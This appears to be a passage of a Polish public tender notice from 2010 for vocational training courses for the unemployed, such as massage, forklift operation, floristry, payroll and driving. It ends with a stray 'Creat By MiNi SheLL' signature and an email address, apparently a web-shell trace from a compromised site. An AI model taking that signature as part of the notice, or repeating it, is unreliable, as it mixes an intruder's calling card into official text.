dla 9 osób (dot. 7 osób z kursu opiekunki i 1 osoby spoza kursu opiekunki), który powinien odbyć się w ciągu min. 50 godzin lekcyjnych (45 minut każda) i składać się z następujących bloków tematycznych:
a)anatomia człowieka,
b)wprowadzenie do masażu - zagadnienia teoretyczne obejmujące:
- techniki masażu i ich oddziaływanie,
- wskazania i przeciwwskazania do masażu,
- wpływ masażu na organizm człowieka,
- metodyka stosowania masażu,
- techniki masażu.
c)część praktyczna I (masaż poszczególnych części ciała):
- masaż kończyny górnej, 
- kończyny dolnej,
- masaż grzbietu,
- kręgosłupa,
- karku i obręczy barkowej,
- klatki piersiowej,
- powłok brzusznych.
d)część praktyczna II:
- masaż całego ciała.
UWAGA! Kurs A i B do przeprowadzenia przez jednego Wykonawcę..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.09.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Organizacja i przeprowadzenie szkolenia:

A.Kurs magazyniera 
B. Kurs operatora wózka widłowego wszystkich typów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Organizacja i przeprowadzenie szkolenia:

A. Kurs magazyniera(badania lekarskie + wykłady + praktyka + egzamin końcowy) - dla 6 osób (z zastrzeżeniem pkt.1), które powinno odbyć się w ciągu min. 130 godzin lekcyjnych (45 minut każda) i składać się z następujących bloków tematycznych:
- organizacja prac magazynowych,
- technologie prac magazynowych,
- wiadomości z zakresu obrotu magazynowego,
- zabezpieczenie towarów,
- minimum sanitarne,
- przepisy bhp i p.poż,
- obsługa kas fiskalnych,
- obsługa programu Subiekt,
B.Organizacja i przeprowadzenie szkolenia Kurs operatora wózka widłowego wszystkich typów (badania lekarskie + wykłady + praktyka + egzamin końcowy) - dla 6 osób (w tym 5 z kursu magazyniera i 1 osoby spoza kursu magazyniera), które winno odbyć się w ciągu min. 45 godzin lekcyjnych (45 minut każda) i składać się z następujących bloków tematycznych:
- część teoretyczna,
- część praktyczna.
UWAGA! Kurs A i B do przeprowadzenia przez jednego Wykonawcę..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.09.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Organizacja i przeprowadzenie szkolenia Kurs pracownika porządkowego i terenów zielonych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Organizacja i przeprowadzenie szkolenia Kurs pracownika porządkowego i terenów zielonych (badania lekarskie + wykłady + praktyka + egzamin końcowy) - dla 3 osób. Kurs powinien odbyć się w ciągu min. 120 godzin lekcyjnych (45 minut każda) i składać się z następujących bloków tematycznych:
A.Prace porządkowe:
a.ogólne zasady utrzymania czystości,
b.zasady stosowania chemicznych środków przy utrzymaniu czystości,
c.utrzymanie porządku wewnątrz budynku (w tym podstawowe czynności, zasady porządkowania pomieszczeń, zasady konserwacji podłóg, obsługa urządzeń, pielęgnacja roślin) i na zewnątrz (w tym pielęgnacja zieleni),
d.obsługa sprzętu i urządzeń mechanicznych (w tym obsługa samojezdnej maszyny czyszczącej,
B.Praca na terenach zielonych:
a.gleboznawstwo i czynniki siedliska,
b.roślinoznawstwo,
c.podstawowe narzędzia używane w terenach zieleni,
d.pielęgnacja terenów zieleni.
C.przepisy bhp i ppoż,
D.zajęcia praktyczne..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.09.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Organizacja i przeprowadzenie szkolenia kosmetycznego:
A.Manicure, pedicure, tipsy i stylizacja
B. Wizaż.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Organizacja i przeprowadzenie szkolenia kosmetycznego:
A.  Manicure, pedicure, tipsy i stylizacja (wykłady + praktyka + egzamin końcowy) - dla 2 osób, które winno odbyć się w ciągu min. 50 godzin lekcyjnych (45 minut każda) i składać się z następujących bloków tematycznych:

- podstawy teoretyczne,
- część praktyczna (metoda żelowa, akrylowa, porcelanowa),
- uzupełnianie tipsów,
- zdobnictwo paznokci,
- przepisy bhp i ppoż.

B. Wizaż (wykłady + praktyka + egzamin końcowy) - dla 3 osób, które winno odbyć się w ciągu min. 50 godzin lekcyjnych (45 minut każda) i składać się z następujących bloków tematycznych:
-wyposażenie do wykonywania makijażu,
-zasady makijażu,
-pielęgnacja i przygotowanie twarzy do makijażu,
-makijaż korekcyjny, oczu, policzków, ust, makijaż dzienny, wieczorowy, ślubny, 
-depilowanie wybranych części ciała,
-pielęgnowanie wybranych części ciała,
-stylizacja postaci i fryzur,
-przepisy bhp i ppoż..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.09.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Organizacja i przeprowadzenie szkolenia  Kurs bukieciarz - florysta.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Organizacja i przeprowadzenie szkolenia  Kurs bukieciarz - florysta (wykłady + praktyka + egzamin końcowy) - dla 2 osób, które winno odbyć się w ciągu min. 70 godzin lekcyjnych (45 minut każda) i składać się z następujących bloków tematycznych:
- anatomia i fizjologia roślin,
- asortyment roślin ozdobnych,
- narzędzia i środki techniczne, w tym sposoby utrwalania materiału roślinnego,
- podstawowe zasady wykonywania kompozycji,
- florystyka ślubna,
- florystyka żałobna,
- florystyka okolicznościowa,
- kompozycje z roślin suchych i preparowanych,
- obsługa kas fiskalnych,
- przepisy bhp i ppoż..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.09.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Organizacja i przeprowadzenie szkolenia Kurs komputerowy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Organizacja i przeprowadzenie szkolenia Kurs komputerowy (wykłady + praktyka + egzamin końcowy) w podziale na:
A.kurs podstawowy - dla 10 osób, który powinien odbyć się w ciągu min. 32 godzin lekcyjnych (45 minut każda). Zakres tematyczny zgonie z załącznikiem nr 1,
B.kurs zaawansowany- dla 5 osób, który powinien odbyć się w ciągu min.45 godzin lekcyjnych(45 minut każda). Zakres tematyczny zgodnie z załącznikiem nr 2,
C.kurs zaawansowany z tworzeniem stron www dla 1 osób, który powinien odbyć się w ciągu min.60 godzin lekcyjnych (45 minut każda). Zakres tematyczny zgodnie z załącznikiem nr 3..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.30.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.09.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Organizacja i przeprowadzenie szkolenia Kadry, płace i obsługa biura.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Organizacja i przeprowadzenie szkolenia Kadry, płace i obsługa biura (wykłady 
+ praktyka + egzamin końcowy) - dla 3 osób powinno odbyć się w ciągu min. 100 godzin lekcyjnych (45 minut każda) i składać się z następujących bloków tematycznych:
- wybrane zagadnienia z prawa pracy, cywilnego i postępowania administracyjnego,
- dokumentacja kadrowej,
- czynności związane z zatrudnianiem pracowników,
- zasady urlopowe,
- czas pracy,
- dokumentacja płacowa; lista płac, karty wynagrodzeń;
- zasad naliczania płac, rozliczanie z ZUS i US,
- świadczenia na rzecz pracowników z ubezpieczenia społecznego,
- fundusz pracy i gwarantowanych świadczeń pracowniczych
- podstawy obsługi programów kadrowych oraz Płatnik, 
- organizacja biura i prowadzenie dokumentacji,
- wykorzystywanie pakietu Office w pracach biurowych,
- autoprezentacja,
- zasady i przepisy BHP w biurze firmy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.09.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Organizacja i przeprowadzenie szkolenia Kurs prawa jazdy kat. B.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Organizacja i przeprowadzenie szkolenia Kurs prawa jazdy kat. B (badania lekarskie + wykłady + praktyka + egzamin końcowy) - dla 12 osób powinno odbyć się w ciągu min. 60  godzin lekcyjnych (45 minut każda) i składać się z następujących bloków tematycznych:
- szkolenie teoretyczne,
- szkolenie praktyczne..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.41.10.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.09.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Organizacja i przeprowadzenie szkolenia Kurs kładzenia glazury i terakoty.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Organizacja i przeprowadzenie szkolenia Kurs kładzenia glazury i terakoty (badania lekarskie + wykłady + praktyka + egzamin końcowy) - dla 1 osoby powinno odbyć się w ciągu min. 110 godzin lekcyjnych (45 minut każda) i składać się z następujących bloków tematycznych: 
-posługiwanie się dokumentacją techniczną,
-technologie układania w zależności od podkładu i materiału okładzinowego, 
-metody przygotowywania podłoża, 
-techniki wykonywania robót, wykończeniowych i dekoracyjnych, 
-zasady organizacji stanowiska pracy, w tym obsługa maszyn i urządzeń do robót glazurniczych,
-przepisy bhp i ppoż.,
-szkolenie praktyczne..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.09.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Organizacja i przeprowadzenie szkolenia Kursy językowe, w podziale na 
trzy moduły językowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Organizacja i przeprowadzenie szkolenia Kursy językowe, w podziale na 
trzy moduły językowe:
A.kurs podstawowy języka niemieckiego (wykłady + egzamin końcowy) - dla 4 osób powinno odbyć się w ciągu min. 48 godzin lekcyjnych (45 minut każda) i składać się z następujących bloków tematycznych:
- nauka języka na poziomie podstawowym,
B.kurs podstawowy języka angielskiego (wykłady + egzamin końcowy) - dla 
3 osób powinno odbyć się w ciągu min. 48 godzin lekcyjnych (45 minut każda), bez posiłku i składać się z następujących bloków tematycznych:
- nauka języka na poziomie zaawansowanym,
C.kurs średniozaawansowany języka angielskiego (wykłady + egzamin końcowy) - dla 1 osoby powinno odbyć się w ciągu min. 60 godzin lekcyjnych (45 minut każda), bez posiłku i składać się z następujących bloków tematycznych:
- nauka języka na poziomie zaawansowanym.

UWAGA! Kursanci mogą być dołączeni do grup - max. 8-mio osobowych.
                  Kurs A, B i C do przeprowadzenia przez jednego Wykonawcę.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.58.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.09.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Organizacja i przeprowadzenie szkolenia Kurs profesjonalnego sprzedawcy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Organizacja i przeprowadzenie szkolenia Kurs profesjonalnego sprzedawcy(badania lekarskie + wykłady + praktyka + egzamin końcowy) - dla 3 osób powinno odbyć się w ciągu min. 100 godzin lekcyjnych (45 minut każda) i składać się z następujących bloków tematycznych:
-podstawowe pojęcia ekonomiczne,
-instrumenty marketingu,
-fakturowanie,
-psychologia sprzedaży,
-kultura obsługi klienta,
-podstawy obsługi komputera,
-program Subiekt,
-obsługa kas fiskalnych,
-bhp i p.poż..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.09.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Organizacja i przeprowadzenie szkolenia Kurs małej przedsiębiorczości.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Organizacja i przeprowadzenie szkolenia Kurs małej przedsiębiorczości (badania lekarskie + wykłady + praktyka + egzamin końcowy) - dla 4 osób powinno odbyć się w ciągu min. 100 godzin lekcyjnych (45 minut każda) i składać się z następujących bloków tematycznych: 
-pomysł na własną firmę,
-podstawy prawne działalności gospodarczej firmy prowadzonej przez osobę fizyczną,
-krok po kroku - jak założyć własną firmę,
-finansowanie bieżącej działalności i rozwoju małej firmy,
-formy opodatkowania osoby fizycznej prowadzącej działalność gospodarczą -
-różne sposoby rozliczania się z Fiskusem - księgowość i inne obowiązki przedsiębiorcy (zaliczki i składki VAT, kasy fiskalne),
-podstawy marketingu i reklamy małej firmy,
-obowiązki wobec ZUS,
-działalność regulowana koncesjami i zezwoleniami, obowiązki sanitarne oraz
wynikające z przepisów BHP i ppoż.,
-techniki informatyczne w biznesie,
-opracowanie własnego biznes planu dla wybranej działalności z wykorzystaniem druku wniosku o przyznanie dotacji na rozpoczęcie działalności gospodarczej (druk obowiązujący w powiecie głogowskim)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.09.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com